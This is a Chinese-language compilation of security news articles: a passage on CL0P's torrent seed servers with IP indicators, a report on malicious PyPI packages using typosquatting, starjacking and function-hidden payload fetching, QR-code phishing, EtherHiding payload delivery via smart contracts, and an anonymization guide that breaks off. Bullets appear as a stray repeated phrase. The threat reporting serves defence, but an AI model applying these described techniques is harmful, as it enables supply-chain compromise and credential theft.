如果一個主機有100%的鏈接，但數量很低，比如只有2-4個，那麼研究人員認為他們是一個潛在的torrent。如果一個主機有100%的鏈接，但數量很多，那麼研究人員認為他們只是一個潛在的原始torrent。任何有低於100%鏈接的主機，研究人員都認為它們是非原始文件種子。 回到以前的IP地址81.19.135[.]21（如下圖所示），研究人員可以看到一個極似原始播種機的樣子。 原始播種機 極有可能的原始seed不僅具有100%seed的高容量，而且是許多受害者唯一登錄的對等點，此外，對等點數據集之間開始出現模式。例如，研究人員認為大多數原始種子主機都使用Transmission 3.00客戶端字符串，進一步將它們的活動綁定在一起；而一個擁有相對唯一的客戶端字符串的主機（如下圖中的主機）卻很少被發現。這讓研究人員更傾向於將它們作為一個實體，只是出於其他原因下載所有數據，並且它們已經完成了下載。 不太可能是原始播種機 所有這一切都是說，這些數據點讓研究人員能夠迅速過濾和淘汰不那麼有趣的對等點，這樣研究人員就可以把注意力集中在重要的點上。 下圖中所示的這個人甚至在每個torrent文件中更改他們的客戶端字符串。這更加證明了他們不是原始播種者，儘管在研究人員觀察他們的時候，他們已經播種了很多數據。 Nonoriginal播種機 通過查看數據並應用上述邏輯，研究人員能夠克服上述一些問題，即在發布torrent文件後研究人員才開始收集數據。 總的來說，研究人員能夠在這個數據集中識別出五個研究人員認為很有可能是原始播種者的主機，以及兩個可能成為未來播種者的主機。這有必要進行更深入的研究。 Seed Group 1有一種模式幾乎立刻就凸顯出來，那就是三個IP地址似乎在同一個網絡上。 81.19.135[.]21 81.19.135[.]25 81.19.135[.]31 這三個IP地址都存在於FlyServers（一家VPS託管公司）擁有的AS 209588的同一個子網中。 IP位於俄羅斯莫斯科。每一個都表現出有趣的特徵，這些特徵進一步將它們聯繫在一起，有力地證明了它們是由攻擊者控制的。 例如，請注意下圖所示的模式，因為它與前兩個IP地址的SSH可用性和FTP可用性有關： 81.19.135[.]21服務掃描 81.19.135[.]25服務掃描 對於以21結尾的IP, SSH端口在2023年8月6日停止響應，FTP端口在2023年8月7日開始響應。對於以25結尾的IP，研究人員看到SSH在2023年8月6日停止，FTP在同一天打開。 同樣，對於下圖中以31結尾的IP，雖然研究人員沒有SSH可見性，但研究人員可以看到FTP也在8月6日打開。 81.19.135[.]31服務掃描 服務器運行的是vsFTPd 3.0.3和OpenSSH_8.4p1。在TCP/8423上以25結尾的IP的簡短可見性表明，它已轉換為在非標準端口上運行SSH。 為了確認播種服務器是不同的實體，而不是某種負載平衡服務背後的同一個盒子，研究人員查看了vsFTPd使用的TLS證書，它們都是自簽名的： 81.19.135[.]21=44102.example.ru，有效期為2023年8月6日22:49:51 GMT-0400；81.19.135[.]25=14868.example.ru，有效期為2023年8月5日23:48:55 GMT-0400；81.19.135[.]31=33916.example.ru，有效期為2023年8月5日23:48:08 GMT-0400； 其中包括了證書的起始日期，如上所述，彼此相距大約一個小時。這意味著，CL0P在他們計劃發布第一個磁力鏈接的大約10天前，在他們公開宣布打算轉向這種傳播方式的5天前，就對這些盒子進行了預處理。 使用這些模式，研究人員擴展了對在Common Name (CN)值中包含example.ru的證書的搜索，這些證書被觀察到具有FTP。研究人員確定了同一子網上的另一台主機(如下圖所示)，它具有類似的功能，但尚未顯示在對等點信息中。 更寬的網絡識別以11結尾的新主機 你可以看到相同的行為，SSH端口在2023年8月6日失去可見性，FTP端口在2023年8月7日變為活動，這與研究人員觀察到的其他情況一致。 81.19.135[.]11=43577.example.ru，有效期為2023年8月6日23:03:31 GMT-0400 在這台主機上還值得注意的是兩個月前Windows服務的出現，如下圖所示。這意味著VPS在該時間範圍內從Windows重新調整為基於*nix的設備。 81.19.135[.]11服務掃描 為了有效地託管竊取的數據，需要進行大量的協調。可能以11結尾的IP地址正準備託管更多的受害文件。 以25和31結尾的兩個IP地址的受害者是在8月15日或幾天后公佈的。而從8月24日開始，以21結尾的IP地址開始在受害者公告中使用，其觀察到的受害者數量幾乎是其他IP地址的四倍。這可能只是研究人員觀察它們的結果，但也可能意味著這個盒子有些不同。 Seed Group 2另一個突出的IP也被Gary Warner在LinkedIn上提到，他正在尋找關於CL0P seed的相同類型的信息。 在Cl0p決定沒有人能夠通過.onion服務器下載他們被盜的數據後，他們遷移到使用bitTorrent。 當然，使用bitTorrent的問題是，攻擊者託管被盜數據的位置變得非常明顯。如果一個人訪問TORRENT，並且只有一個IP地址提供100%的數據，對於更大的數據集，那麼幾乎可以肯定，這就是攻擊者為提供文件而獲得的主機。但對於微小的數據集來說，情況並非如此，對於這些數據集，攻擊者可以在很短的時間內等待其他人獲得100%的文件，然後斷開他們的原始位置。 目前，“100%”數據集的主要位置是： 95.215.0[.]76=AS34665 Petersburg Internet, St. Petersburg Russia，這是 在pindc[.]ru上託管的公司招聘信息。 此IP地址為95.215.0[.]76，如下圖所示，與以前的數據集有一些相似之處。具體來說，使用了字符串Transmission 3.00的BitTorrent客戶端，託管提供商是另一家俄羅斯公司。 另一個已確認的原始種子服務器 果不其然，這個播種服務器（如下圖所示）表現出與其他數據集類似的行為，因為它也與服務相關。然而，這個活動比另一個數據集早一個月發生，SSH服務一直持續到7月17日，FTP服務從7月18日開始出現。 95.215.0[.]76服務掃描 這可能是一個較舊的盒子，它還使用一組不同的服務來託管FTP，並進一步利用ProFTPD。同樣，VPS託管在俄羅斯聖彼得堡，並由AS 34665宣布用於彼得堡互聯網（PIN）數據中心。 此IP與IP地址95.215.1[.]221共享下面的SSH密鑰。 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNos5CNsQHUKlXJSFDJKtPB/4FlkqW6R0crEQaONn3TJ2TICxQRUTh8DgITlLcidJf0pnn0zVMWwE6PsWDI3eZU= 雖然研究人員目前還沒有觀察到這個IP地址，但還不知道這是由於可見性問題還是該盒子尚未用於託管原因造成的，它確實與SSH和FTP共享相同的顯著行為。如下圖所示： 95.215.1[.]221服務掃描 Seed Group 3將這些模式應用到研究人員收集的其他對等體上，下圖中顯示了IP地址92.118.36[.]111。 獨立seed主機 在該樣本中，研究人員只觀察到它以100%的速度為Articuno播種了一個torrent，它位於阿姆斯特丹，由StreamHost的AS 209132宣布。 這個torrent的一致之處在於，它使用Transmission 3.00客戶端字符串，並且從8月9日開始具有類似的FTP訪問權限。如下圖所示： 92.118.36[.]111服務掃描 最後要說明的一點是，在搜索這個IP地址時，研究人員偶然發現了一個以112結尾的下一個IP的AbuseIPDB報告，如下圖所示：它在2023年6月初顯示了一份針對MOVEit漏洞的地址掃描報告，該漏洞是CL0P用來竊取所有這些數據的漏洞。 AbuseIPDB關於92.118.36[.]112的報告 這兩者之間是否有關聯尚不清楚，但如果沒有關聯，這將是一個有趣的巧合。 總結在本文所講解的樣本中，俄羅斯的幾個託管服務器保存了大量被盜受害者的數據。 根據分析，這些攻擊者很可能利用FTP將被盜文件傳輸到種子盒。另外，在FTP服務啟動之前，SSH訪問的一般可見性會立即關閉，這可能意味著很多事情，但最重要的是，在宣布磁力鏈接之前，他們可能會在服務器上預留被盜數據相當長的一段時間。 同樣，受害者數據在seed盒中的分佈也與他們的公告時間表不一致。這說明在torrent產生之前，數據已經在盒子上保存了一段時間，這可能是他們用來避免seed追踪的一種技術，方法是同時宣布不同的受害者，但從不同的盒子裡播種。

要點•在2023年9月，一名攻擊者通過Pypi執行了一次針對性的攻擊，將使用阿里雲服務、AWS和Telegram的開發人員吸引到惡意軟件包。 •這些軟件包中的惡意代碼不是自動執行，而是巧妙地隱藏在函數中，旨在僅在這些函數被調用時才觸發。 •攻擊者利用誤植域名和星標劫持（Starjacking）這兩種技術將開發人員引誘到惡意軟件包。 •其中一個惡意軟包模仿一個流行的代碼存儲庫，利用了它在Pypi軟件包管理器中的缺失大做文章。 在今年9月份，一個化名為“kohlersbtuh15”的攻擊者試圖通過向PyPi軟件包管理器上傳一系列惡意軟件包來鑽開源社區的空子。 從這些軟件包的名稱及其中所含的代碼來看，攻擊者的目標似乎是使用阿里雲服務、Telegram和AWS的開發人員。 圖1. kohlersbtuh15用戶帳戶 攻擊者實施了諸多技術，包括誤植域名和星標劫持（指攻擊者通過將軟件包鏈接到GitHub上一個毫不相關的不同軟件包的代碼存儲庫，以操縱衡量軟件包受歡迎程度的星標），以誘騙受害者下載惡意軟件包。 這種攻擊的特別之處在於，不同於在Python軟件包的設置文件中植入惡意代碼這種常見策略（一旦軟件包安裝就會自動執行），這個攻擊者將惡意腳本嵌入到軟件包的深處，嵌入到特定的函數中。這意味著惡意代碼只會在正常使用期間特定函數被調用時執行。 這種隱藏惡意代碼的獨特方法不僅有助於隱藏代碼，還針對特定的操作或功能，從而使攻擊更有效、更難檢測。此外，由於許多安全工具掃描查找可自動執行的惡意腳本，將代碼嵌入到函數中加大了規避這類安全措施的可能性。 攻擊途徑：誤植域名誤植域名利用開發人員在輸入安裝命令時所犯的擊鍵錯誤來利用人為錯誤，威脅分子可能會發布名稱與目標軟件包相似的惡意軟件包。 此外，如果開發人員在瀏覽網頁時不小心拼錯了合法軟件包的名稱，他們可能會在渾然不覺的情況下進入到惡意軟件包的網站。 攻擊者的手法是製作一個酷似合法軟件包的軟件包，但添加了一個隱藏的惡意依賴項，從而觸發惡意腳本在後台運行。攻擊者也可能將惡意代碼直接嵌入到軟件包中。 從受害者的角度來看，軟件包似乎正常運行，掩蓋了幕後開展的惡意活動。 攻擊途徑：星標劫持對於開源開發人員說，通常的工作流程包括在GitHub上託管項目，並通過NPM或PyPi等軟件包管理器分發可使用的軟件包。 從軟件包管理器中選擇軟件包時，開發人員通常查看該軟件包的受歡迎程度，通常是通過其GitHub統計數據來查看，一些軟件包管理器直觀地顯示這個指標，以此表明其質量和維護水平。 然而，軟件包管理器顯示的統計數據並沒有經過任何驗證，偽造這些統計數據很簡單。 星標劫持是將託管在軟件包管理器上的軟件包鏈接到GitHub上另一個毫不相關的軟件包的代碼存儲庫的做法。然後，毫無防備的開發人員上當受騙，以為這是值得信賴的軟件包。 為了最大限度地擴大攻擊範圍，攻擊者將星標劫持和誤植域名結合在同一個軟件包中，而這正是攻擊者決定對其許多軟件包所做的操作，“Telethon2”就是一個例子。 圖2 Telethon 2其中一個引人注目的軟件包是python軟件包Telethon2，它模仿了流行的“Telethon”軟件包（下載量達6900萬次），它還通過使用“telethon”軟件包的GitHub官方代碼存儲庫來執行星標劫持。 負責這起活動的攻擊者從官方“telethon”軟件包複製了完全相同的源代碼，只有一點不同：在“telethon/client/messages.py”文件中嵌入了以下兩行惡意代碼。 圖3. 惡意代碼隱藏在telethon2-1.30.3/telethon/client/messages.py的send_message函數中。 惡意代碼不是在軟件包下載時自動執行，而是在“send message”函數被調用才被激活。 這段代碼從“hxxps[:]//tg[.]aliyun-sdk-requests[.]xyz/telegram”中獲取base64編碼的外部內容，然後將其解碼以執行操作系統命令。 enumerate-iam另一個引人注目的軟件包是“enumerate-iam”軟件包。攻擊者利用了一個名為“enumerate-iam”的流行GitHub代碼存儲庫，該代碼存儲庫並沒有相應的Python軟件包，攻擊者創建了自己的惡意Python軟件包，與合法代碼存儲庫同名。 圖4. 合法GitHub代碼存儲庫：enumerate-iam 圖5. 惡意軟件包：“enumerate-iam” 與攻擊者的其他軟件包一樣，惡意代碼隱藏在軟件包中的一個函數中，一旦函數被激活，就會試圖竊取敏感憑據。 圖6 對於在GitHub上維護項目的維護者來說，這個跡象充分錶明至少要有一個佔位符軟件包，以防止攻擊者利用這條攻擊途徑。 圖7. 該列表顯示了惡意軟件包及其相應的攻擊技術 圖8. 按國家或地區劃分的惡意軟件包總下載量百分比分佈 影響通過瞄準Telegram、AWS和阿里雲等平台上使用的流行軟件包，攻擊者展示了很高的精準度。這不是一起隨機的行為，而是一起蓄意的行為，以攻擊依賴這些廣泛使用的平台的特定用戶，可能影響數百萬人。 這起攻擊的潛在損害並不僅限於受攻擊的系統，還涉及與這些平台相關的特定數據，包括來自Telegram的通訊內容細節、來自AWS的敏感雲數據以及來自阿里雲的業務相關信息。 攻擊者在特定函數中嵌入惡意代碼，以確保有害腳本在這些函數被調用之前保持潛伏狀態。這種方法不僅繞過了通常檢測自動執行腳本的許多常規安全掃描，還允許發動更有針對性的攻擊。當毫無戒心的開發人員或用戶調用這些函數時，他們不知不覺中激活了惡意代碼，使攻擊既隱蔽又高效。 結論星標劫持和誤植域名是攻擊者採用的常見方法，以加大攻擊得逞、感染盡可能多目標的機會。這些技術旨在使軟件包看起來很受歡迎，並強調使用它的其他開發人員的數量之多，從而提高軟件包的可信度。 對於在GitHub上維護熱門項目的那些人來說，至少在PyPi這樣的平台上擁有佔位符軟件包可以作為一種防護措施，防止伺機下手的攻擊者利用合法軟件包的缺失大做文章。 在代碼中使用惡意軟件包作為依賴項帶來了很大的風險，在最好的情況下，最終會感染網絡中擁有高優先權的開發人員帳戶；如果不那麼幸運，最終可能會使客戶感染上被污染的軟件版本。 軟件包•enumerate-iam •aliababcloud-tea-openapi •alibabacloud-vpc20180317 •python-cos-sdk-v5 •alibabacloud-ecs20180317 •aliyun-oss2 •python-aliyun-sdk-kms •python-aliyun-sdk-ecs •python-aliyun-sdk-rds •python-aliyun-sdk-core •telethon2 •tencentcloud-python-sdk •arangodba •aws-consoler2

二維碼無處不在，你可以在海報和傳單、ATM屏幕、價籤和商品甚至建築物上看到它們，人們用它們來分享信息，推廣各種在線資源，然而，你卻很少在電子郵件中看到二維碼。用戶無需掃描即可在手機上直接閱讀信息，因為大多數信件都帶有普通的超鏈接，但攻擊者正越來越多地通過電子郵件發送的二維碼來實施攻擊。 與易於檢查和屏蔽的釣魚鏈接不同，二維碼是安全解決方案中令人頭疼的問題。分析二維碼並找出其中包含的信息，需要昂貴且資源豐富的計算機視覺技術。更糟糕的是，雖然一個普通的鏈接只需看一眼就可以整理出來，但使用二維碼，在掃描之前，你無法判斷它會把你重定向到哪裡。 二維碼也稱快速響應碼，是一種二維矩陣條形碼，由幾個正方形和多個點（模塊）組成，排列在白色背景上的正方形圖案中，可以使用圖像處理設備來掃描QR碼。它將首先通過正方形識別代碼的位置，然後讀取點中編碼的信息，除了實際的代碼外，方形區域還可以容納裝飾元素，例如公司徽標。 二維碼比1D條形碼能夠編碼更多的數據，它們通常用於編碼指向各種資源的超鏈接，例如商店目錄、結賬頁面或建築信息頁面。 電子郵件中的惡意二維碼攻擊者使用二維碼對網絡釣魚和詐騙頁面的鏈接進行編碼，研究人員在2021年底註冊了第一次使用該技巧進行惡意電子郵件活動的嘗試。這些都是模仿聯邦快遞（FedEx）和DHL等快遞服務公司電子郵件的詐騙信息，受害者會被誘騙通過掃描二維碼支付關稅，編碼的鏈接正在重定向到一個偽造的銀行卡數據輸入頁面。這場活動的規模不大，並到2022年年中有所減少。研究人員在2023年春季觀察到的以二維碼為特色的新電子郵件活動，與第一次不同的是，這次是針對微軟產品企業用戶的登錄名和密碼。 攻擊者向受害者發送信息，告知他們的公司電子郵件帳戶密碼即將過期，為了保留對賬戶的訪問權限，用戶需要掃描二維碼。一些電子郵件將來自免費郵件地址，另一些則來自最近註冊的域名，在一些信息中，攻擊者在二維碼中添加了微軟安全標誌，以提高可信度。 帶有二維碼的釣魚郵件 在收到釣魚郵件並掃描代碼後，用戶將被重定向到一個類似微軟登錄頁面的虛假登錄頁面，只要輸入登錄名和密碼，攻擊者就可以訪問該帳戶。 除了敦促用戶更改密碼或更新個人數據的消息外，我們還檢測到一個未發送的電子郵件通知活動，該活動還使用二維碼重定向到虛假的微軟帳戶登錄頁面。 以下截圖所示的信件沒有二維碼標誌，但帶有“此郵件來自可信來源”的字樣，讓用戶放鬆警惕。 未發送的郵件通知 掃描二維碼時看到的一些頁面位於IPFS資源中，攻擊者會用這種分佈式文件系統發起攻擊。 IPFS是一種點對點的網絡協議，旨在創建持久且分佈式存儲和共享文件的網絡傳輸協議，IPFS網絡釣魚活動與傳統網絡釣魚活動類似，攻擊者模仿合法服務和軟件（如DHL、DocuSign和Adobe）來增加進入目標收件箱的可能性。 統計數據 從2023年6月到8月，研究人員檢測到8878封包含二維碼的網絡釣魚郵件，惡意活動在6月份達到頂峰，有5063封信，到8月份減少到762封信。 2023年6月至8月帶有二維碼的釣魚電子郵件數量趨勢 總結攻擊者可以通過多種方式使用二維碼。首先，這些代碼使他們能夠避免安全措施檢測和屏蔽他們的電子郵件，查看二維碼內容並不容易，而且消息中沒有釣魚鏈接；此外，一封信不能僅僅因為裡面有二維碼就被屏蔽，儘管二維碼不是一個流行的電子郵件元素，但二維碼也可以用於合法的通信，例如發件人的自動簽名；其次，由於消息中不包含鏈接，因此無需註冊額外的帳戶或域來重定向用戶，從而隱藏網絡釣魚；最後，大多數用戶使用智能手機攝像頭掃描二維碼，並希望盡快解決問題。因此，他們可能會忽略重定向到的頁面的地址行，因為它在移動瀏覽器中不太顯眼。 另一方面，合法發件人幾乎從不在郵件中使用二維碼，因此僅僅在電子郵件中出現二維碼就可能引發懷疑；此外，掃描二維碼需要另一個設備，而用戶可能沒有現成的設備。目前研究人員還沒有觀察到許多基於二維碼的攻擊活動，他們只能假設實際掃描代碼的收件人不多。儘管如此，考慮到該機制的使用情況，預計這種攻擊在短期內會增加，且活動本身也會變得更加複雜，並針對特定目標進行調整。

Guardio Labs研究人員Nati Tal和Oleg Zaytsev發現黑客使用了一種名為EtherHiding的代碼分發技術，濫用幣安智能鏈（BSC）的智能合約來隱藏惡意腳本。在該網絡攻擊活動中，攻擊者使用劫持的WordPress網站誤導用戶下載惡意虛造的瀏覽器更新，然後將用戶重定向到Cloudflare Worker主機來注入惡意腳本到被黑的網站。由於濫用的Cloudflare Worker主機被攔截，隨後攻擊者轉向使用去中心化、匿名的公開區塊鏈系統提供更加可靠和隱蔽的分發信道，使用區塊鏈系統使得攻擊活動難以檢測和攔截。 EtherHiding惡意軟件EtherHiding是名為ClearFake的黑客組織用來分發代碼的新技術，分發的代碼被注入到被黑的網站上以展示虛假的瀏覽器更新，Guardio Labs研究人員解釋稱黑客正在攻擊有價值的WordPress網站或被黑的管理員憑證來注入兩個腳本標籤到網站。這些腳本注入會加載幣安智能鏈JS庫，並從區塊鏈取回惡意腳本，並註入到網站中。 圖為連接幣安鏈的JS 從幣安鏈取回的代碼會注入到網站中，以觸發第三階段payload的下載。第三階段payload是從攻擊者所有的C2服務器下載的，C2地址直接來源於區塊鏈，所以攻擊者可以很輕鬆地修改以繞過攔截方法。用戶瀏覽器中運行的第三階段payload會在網站上展示一個虛假的覆蓋，要求用戶更新Chrome、Edge或Firefox瀏覽器。 圖為展示在被黑網站上的虛假Chrome更新 一旦受害者點擊更新按鈕，就會被重定向到Dropbox或其他合法的託管網站來下載惡意可執行文件。 圖為最新的ClearFake攻擊鏈 使用區塊鏈的優勢區塊鍊是用來運行去中心化應用和智能合約的，區塊鏈上的代碼無法被修改和刪除，所以使用區塊鏈作為基礎設施可以使得攻擊活動無法被攔截。如果其中一個域名被識別和標記，攻擊者可以更新鏈來交換為其他惡意代碼和相關的域名。此外，做這些修改不會產生費用，所以網絡犯罪分子可以濫用這些系統進行攻擊活動而無需承擔額外的成本。 圖為惡意智能合約 智能合約部署在幣安鏈上後，可以匿名運行，且無法被阻止。即使將該地址報告為惡意的，也無法阻止其分發惡意代碼。 Guardio Labs稱報告該地址會觸發幣安鏈瀏覽器頁面的告警不要與該地址交互，但被黑的WordPress網站訪問者不會看到這樣的告警信息。 圖為幣安鏈上報告的地址 解決這一問題的唯一方法就是關注WordPress安全，使用強、唯一的管理員密碼，保持插件更新，移除不使用的賬戶。隨著區塊鏈方法的優勢，未來區塊鏈濫用於payload分發會變得越來越頻繁。 更多技術細節參見：https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16

儘管相關組織採用了多種保護措施，但涉及個人身份信息（PII）的數據洩露仍然會給各行各業造成重大的經濟損失。根據IBM發布的《2023年数据泄露成本报告》 顯示，在2022年3月至2023年3月期間，被洩露的客戶和員工PII分別給企業造成了每條記錄183美元和181美元的損失。 匿名化（Anonymization）是最有效的數據保護措施之一，可以防止個人數據洩露，或者至少可以降低每個洩露的個人數據記錄的成本。在本文中，我們將了解什麼是數據匿名化，研究其類型和主要挑戰，並提供有關匿名化數據的最佳實踐。 什麼是數據匿名化？數據匿名化是將敏感的個人信息轉換為不能與特定人員聯繫的匿名數據的過程。此過程包括刪除或編輯PII。根據個人身份信息的獨特性和個人身份識別的難易程度，個人身份信息可分為兩類： 马云惹不起马云直接標識符（Direct Identifier），指的是可用於直接識別個人的唯一信息，包括姓名、物理地址、電子郵件地址、可識別的照片、電話號碼和社保號碼等。 马云惹不起马云間接標識符（Indirect Identifier），也稱為“類識別符”，指能夠幫助建立信息之間的關聯，將要識別的個人從人群中摘選出來的數據。常見的間接標識符包括生日、年齡、性別、郵件編碼等。這些數據無法單獨識別某人，但稍作組合就可以實現強大的識別能力。 數據匿名化可以幫助公司保護其客戶、員工或合作夥伴的敏感信息隱私，同時仍允許他們將其用於商業目的。因此，如果惡意行為者設法破壞以前匿名化的數據，他們將無法輕鬆識別該數據屬於誰；反過來，數據匿名化有助於防止身份盜竊、金融欺詐、跟踪和騷擾、歧視和其他侵犯隱私的行為。 根據Verizon的《2023年数据泄露调查报告》 ，個人數據是以下行業中最常見的數據洩露類型： 马云惹不起马云金融和保險，個人數據洩露佔比74； 马云惹不起马云醫療保健，67%； 马云惹不起马云製造業，60%； 马云惹不起马云專業的科學和技術服務行業，57%； 马云惹不起马云教育服務，56%； 马云惹不起马云信息行業，51%； 马云惹不起马云採礦、採石、石油和天然氣開采和公用事業政府，50%； 马云惹不起马云公共管理機構，38%。 由於數據洩露，各行各業仍在丟失大量個人數據，上述統計數據強調了實施量身定制的個人數據保護措施的重要性。 個人數據洩露不僅表明組織的安全存在漏洞，還可能導致客戶信任和收入的損失、違規罰款和法律責任。 通過隱藏或刪除收集數據中的PII，組織可以將未經授權訪問內部數據資產所造成的損害降至最低。這就是匿名化的目的。 數據匿名化的類型數據的匿名化可以通過多種方式實現，以下是一些最常見的數據匿名化技術： 1. 數據脫敏（Data Masking）數據脫敏，又稱數據漂白、數據去隱私化或數據變形，指的是對數據集中的敏感信息進行加密，以便在企業用於分析和測試時保護原始數據。在涉及用戶安全數據或一些商業性敏感數據的情況下，在不違反系統規則條件下，對真實數據進行改造並提供測試使用，如身份證號、手機號、卡號等個人信息都需要進行數據脫敏。 當數據需要由不同的各方共享或訪問時，這種技術通常很有用。例如，可以用隨機生成的字符或數字替換諸如社會保險號、姓名和地址之類的個人識別信息（PII），或者用“X”替換社會保險號或信用卡號中除最後四位數字以外的所有數字，從而保護數據安全。 2. 數據泛化（Data Generalization）顧名思義，這種技術是用更通用的數據值替換特定的數據值，敏感數據可以被修改成一系列的範圍或一個具有合理邊界的大區域，或者在保持數據準確性的前提下，刪除一些標識符。例如，一個人的確切年齡是匿名的，只顯示一個更通用/廣泛的年齡範圍，比如25-34歲。因此，這種技術可以應用於多種類型的數據，例如人口統計數據或事務數據。值得注意的是，平衡對數據執行的泛化也很重要，這樣它就不會損害數據對分析的有用性。 3. 數據置換（Data Swapping）這種技術指的是在數據集中重新排列或置換兩個或多個敏感數據記錄，匿名化是通過將一條記錄中的值與另一條記錄的相應值置換或交換來完成的，即置換數據集中兩條記錄的位置。例如，在包含姓名或社會保險號等敏感信息的醫療記錄中，置換某些字段的值將有助於保護患者的隱私，同時保持所有其他記錄的完整。對數據集中兩個或多個個體之間的值進行置換不僅能夠保留數據集的統計屬性，還能保護個體的身份安全。 4.數據假名化（Pseudonymization）這種技術被認為不如其他匿名化技術（如數據脫敏）有效，後者確保匿名數據集難以檢索，在這種技術中，原始PII被替換為假標識符或假名，但保留了可以訪問原始數據的特定標識符。因此，虛假標識符可能與個人的真實身份直接相關，也可能不直接相關。數據假名化通常用於任何業務分析或測試不需要敏感或個人數據，但需要掩蓋個人身份的情況。例如，在醫學研究中，根據倫理和強制立法，病人的身份可能需要模糊。但是，可能仍然需要某些形式的病人身份證明，以便將不同來源的醫療記錄聯繫起來。 它可以與散列、加密或令牌化等方法結合使用。例如，將姓名或身份證號等數據轉換為固定長度的字符串，稱為散列或隨機生成的令牌（隨機字母數字代碼），它是原始數據的唯一表示，但不能反向識別或顯示原始數據。然後，該散列可以用作原始PII的假名。 5.差分隱私（Differential Privacy）差分隱私（簡稱DP）是用來保護隱私的密碼學技術，通過對查詢的結果加入噪音，使得查詢操作的實際結果隱藏起來或模糊化，直至無法區分，從而實現對敏感數據的保護。這種受控噪聲不會顯著影響對數據進行的任何分析結果的準確性；因此，它是一種基於擾動的匿名化的具體方法。添加到數據中的噪聲量由一個稱為隱私預算的參數決定 不過，無論您選擇何種方法對組織中的數據進行匿名化處理，都仍可能會面臨一些挑戰。 數據匿名化的主要挑戰有效的匿名化可以起到很好的屏障作用，然而，實現有效的匿名化並不像想像的那麼容易。以下是組織在匿名化數據時經常面臨的關鍵挑戰： 1.平衡隱私和實用性在數據匿名化和數據效用之間取得平衡至關重要，但也極具挑戰性。一方面，有效的匿名化過程對於保護客戶、員工和其他用戶的隱私至關重要。因此，能夠從數據中完全清除PII的匿名化技術和工具對於維護個人隱私非常有益。 另一方面，企業收集和使用對研究、分析和決策有價值的數據也是至關重要的。事實上，完全匿名的數據可能會對業務毫無價值，這使得數據收集和處理失去了原有意義。 組織的最終目標是實現和維護最大程度的隱私保護，同時保持足夠的數據準確性。實現這一目標可能需要對數據匿名化過程進行持續評估和優化。 2.防止重標識（re-identification）除非您使用的是一勞永逸地刪除個人身份信息的匿名化技術，否則始終存在匿名數據被用來追踪特定個人的風險。 惡意行為者利用大量攻擊來重新識別個人，甚至重利用匿名數據。例如，如果他們設法訪問包含財務信息的匿名數據集，然後將其與其他數據集（如選民登記數據庫）結合起來，並最終執行重標識。 因此，組織必須確保所收集信息的隱私性。為加強對數據隱私的保護，可考慮將匿名化與其他數據安全方法結合使用。 3.遵守數據安全要求各種數據保護法案定義了組織應該如何收集、存儲和處理個人信息。其中一些法案建議使用匿名化技術，例如： 马云惹不起马云通用數據保護條例（GDPR）——這是一項歐盟法規，它沒有強制要求數據匿名化，但鼓勵使用匿名化技術來保護數據以及其他保護措施。 马云惹不起马云加州消費者隱私法案（CCPA）——美國法案，強制組織匿名收集數據，以提高數據的隱私性。它還要求各組織採取一切必要手段保持數據匿名化並防止重標識。 马云惹不起马云個人信息保護和電子文檔法案（PIPEDA）——加拿大的一部法律，要求組織保護個人信息，並將匿名化列為數據保護方法之一。每一項立法都明確規定，組織需要像對待個人數據一樣對待匿名數據，並對其進行適當保護。 數據匿名化最佳實踐下述數據匿名化最佳實踐可以幫助組織保護個人信息，同時保留數據的分析價值。 1.進行數據發現和分類如果不知道數據集中存在什麼PII，談何匿名化數據。這就是為什麼有必要識別收集和存儲的數據中的所有直接和間接標識符，執行數據發現和分類可以幫助實現這一點。 數據發現旨在簡化數據管理。它涉及到組織存儲的所有數據的標識、數據類型以及不同數據資產之間的關係；另一方面，數據分類結合了基於數據屬性和特徵的分類和標記。通過將數據劃分為不同的類別，數據分類使組織更容易實現針對各種類型數據的具體情況量身定制的安全措施。 實現這兩個實踐可以讓組織準確地識別需要匿名化的敏感數據，並確保所有此類數據均受到保護。此外，組織還可以以此決定使用哪些匿名化技術，並選擇能夠處理需要匿名化的具體數據的技術。 2.優先處理數據用例除非您確切地知道組織內的人員如何使用數據，否則您無法採取措施來保護數據。識別所有數據用例並對其進行優先級排序可以幫助您提高匿名化工作的效率。 考慮與組織內的數據使用者接觸，以確定他們如何使用數據以及出於什麼目的使用數據，它將幫助您揭示最常見的數據用例及其對您業務的重要性。然後，根據它們對數據隱私和業務價值構成的風險對這些用例進行優先排序。 有了數據用例的優先級列表，您將更容易決定應該首先匿名化哪些敏感信息，從而優化匿名化所需的資源和工作分配。 3.映射相關法律規定雖然保持敏感個人信息的安全是匿名化的最終目標，但對您的業務來說，遵守數據保護要求也至關重要。映射適用於組織的法律、標準和法規是遵循法規的第一步。為了映射適用的法律要求，建議遵循以下步驟： 马云惹不起马云確定適用於您的行業、位置和運營區域的要求； 马云惹不起马云研究和理解要求； 马云惹不起马云用您的團隊能夠理解的方式來解釋要求； 马云惹不起马云將要求集成到您的工作過程中； 马云惹不起马云記錄要求和既定的程序以滿足這些要求； 马云惹不起马云持續監控這些要求是否有任何更改，以及是否出現新的要求； 马云惹不起马云定期更新文件，提高員工對合規措施的意識。 除了幫助您採用正確的措施來實現合規性之外，映射相關的法律要求還可以增強您的數據匿名化工作。 4.最小化數據收集您可能認為收集的數據越多，您的分析就越準確，對您的業務也就越有利。然而，大量的數據收集可能是有害的。當您收集了太多數據時，您很少會使用所有數據，但您仍然需要分配資源來存儲和保護未使用的數據資產。 最小化數據收集可以簡化數據匿名化過程，降低數據安全風險。因此，只收集分析所必需的數據，避免收集未來可能永不會使用的數據。 5.評估當前的技術堆棧如今，許多平台都默認內置了數據匿名化功能。但是，您仍然需要評估當前技術的功能是否足以正確地匿名化個人數據，防止重標識，並滿足數據保護要求。 考慮分析當前技術棧的匿名化功能，以檢查它們是否與您想要達到的匿名化水平相匹配。此外，檢查它們是否能幫助您滿足適用於您組織的數據保護要求。 此過程將幫助您確定當前的堆棧是否足以滿足您的匿名化需求，以及是否存在需要通過部署其他數據匿名化工具來彌合的缺口。 6.提前為重標識做好準備您的組織可能出於合法原因需要重標識以前匿名的數據。例如，您可能需要它進行數據分析、定制客戶支持或安全事件調查，這就是最好事先考慮去匿名化過程的原因所在。為此，可考慮採取以下措施： 马云惹不起马云驗證您的匿名化技術是否支持重標識； 马云惹不起马云定義並記錄數據重標識的合法原因； 马云惹不起马云制定關於重標識過程的指導方針，並指定可用於數據去匿名化的技術和工具； 马云惹不起马云指定人員對重標識過程負責； 